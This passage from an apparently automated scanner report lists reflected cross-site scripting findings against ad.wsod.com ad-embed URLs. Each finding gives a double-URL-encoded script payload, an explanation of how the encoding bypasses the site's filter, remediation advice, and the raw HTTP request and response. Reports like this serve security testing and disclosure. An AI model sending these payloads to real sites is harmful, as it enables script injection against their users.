<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30351b5";alert(1)//463fb0d5a8a/1292781965**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

2.4. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781815776969 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781815776969

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7d5b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee29654e3442 was submitted in the REST URL parameter 3. This input was echoed as f7d5b"><script>alert(1)</script>e29654e3442 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30f7d5b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee29654e3442/1292781815776969 HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 18:06:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1926

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30f7d5b"><script>alert(1)</script>e29654e3442/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

2.5. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781816** [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781816**

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f090d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee24cabfa7af was submitted in the REST URL parameter 2. This input was echoed as f090d"><script>alert(1)</script>e24cabfa7af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357f090d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee24cabfa7af/561.0.iframe.120x30/1292781816** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 18:06:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1926

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357f090d"><script>alert(1)</script>e24cabfa7af/561.0.iframe.120x30/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

2.6. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781816** [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781816**

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e78a%2522%253balert%25281%2529%252f%252f79b3c23bea6 was submitted in the REST URL parameter 2. This input was echoed as 7e78a";alert(1)//79b3c23bea6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a6313577e78a%2522%253balert%25281%2529%252f%252f79b3c23bea6/561.0.iframe.120x30/1292781816** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 18:06:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1881

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a6313577e78a";alert(1)//79b3c23bea6/561.0.iframe.120x30/1292781965**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

2.7. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781816** [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781816**

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 481cf%2522%253balert%25281%2529%252f%252fb8c97658fa9 was submitted in the REST URL parameter 3. This input was echoed as 481cf";alert(1)//b8c97658fa9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30481cf%2522%253balert%25281%2529%252f%252fb8c97658fa9/1292781816** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 18:06:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1881

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30481cf";alert(1)//b8c97658fa9/1292781966**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

2.8. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781816** [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781816**

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9245%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed30d10f1140 was submitted in the REST URL parameter 3. This input was echoed as f9245"><script>alert(1)</script>d30d10f1140 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30f9245%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed30d10f1140/1292781816** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 18:06:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1926

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30f9245"><script>alert(1)</script>d30d10f1140/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

2.9. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871** [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871**

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b792%2522%253balert%25281%2529%252f%252fba89bde7c7b was submitted in the REST URL parameter 2. This input was echoed as 4b792";alert(1)//ba89bde7c7b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a6313574b792%2522%253balert%25281%2529%252f%252fba89bde7c7b/561.0.iframe.120x30/1292781871** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 18:06:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1881

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a6313574b792";alert(1)//ba89bde7c7b/561.0.iframe.120x30/1292781966**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

2.10. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871** [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871**

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 601d4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9e988e2cfa0 was submitted in the REST URL parameter 2. This input was echoed as 601d4"><script>alert(1)</script>9e988e2cfa0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357601d4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9e988e2cfa0/561.0.iframe.120x30/1292781871** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 18:06:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1926

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357601d4"><script>alert(1)</script>9e988e2cfa0/561.0.iframe.120x30/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

2.11. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871** [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871**

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4831c%2522%253balert%25281%2529%252f%252f90c3c0b2505 was submitted in the REST URL parameter 3. This input was echoed as 4831c";alert(1)//90c3c0b2505 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x304831c%2522%253balert%25281%2529%252f%252f90c3c0b2505/1292781871** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 18:06:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1881

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x304831c";alert(1)//90c3c0b2505/1292781966**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

2.12. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871** [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871**

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81ecb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e80e4aff9d66 was submitted in the REST URL parameter 3. This input was echoed as 81ecb"><script>alert(1)</script>80e4aff9d66 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x3081ecb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e80e4aff9d66/1292781871** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 18:06:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1926

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x3081ecb"><script>alert(1)</script>80e4aff9d66/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

2.13. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871793740 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871793740

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 774e0%2522%253balert%25281%2529%252f%252fc797c1e1737 was submitted in the REST URL parameter 2. This input was echoed as 774e0";alert(1)//c797c1e1737 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357774e0%2522%253balert%25281%2529%252f%252fc797c1e1737/561.0.iframe.120x30/1292781871793740 HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 18:06:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1881

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357774e0";alert(1)//c797c1e1737/561.0.iframe.120x30/1292781965**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

2.14. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871793740 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871793740

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ecbc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c82208ba9a was submitted in the REST URL parameter 2. This input was echoed as 4ecbc"><script>alert(1)</script>8c82208ba9a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a6313574ecbc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c82208ba9a/561.0.iframe.120x30/1292781871793740 HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 18:06:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1926

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a6313574ecbc"><script>alert(1)</script>8c82208ba9a/561.0.iframe.120x30/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

2.15. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871793740 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871793740

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dff08%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec72cac2bc34 was submitted in the REST URL parameter 3. This input was echoed as dff08"><script>alert(1)</script>c72cac2bc34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30dff08%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec72cac2bc34/1292781871793740 HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 18:06:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1926

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30dff08"><script>alert(1)</script>c72cac2bc34/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

2.16. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871793740 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871793740

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fcfe0%2522%253balert%25281%2529%252f%252f522001d1e27 was submitted in the REST URL parameter 3. This input was echoed as fcfe0";alert(1)//522001d1e27 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

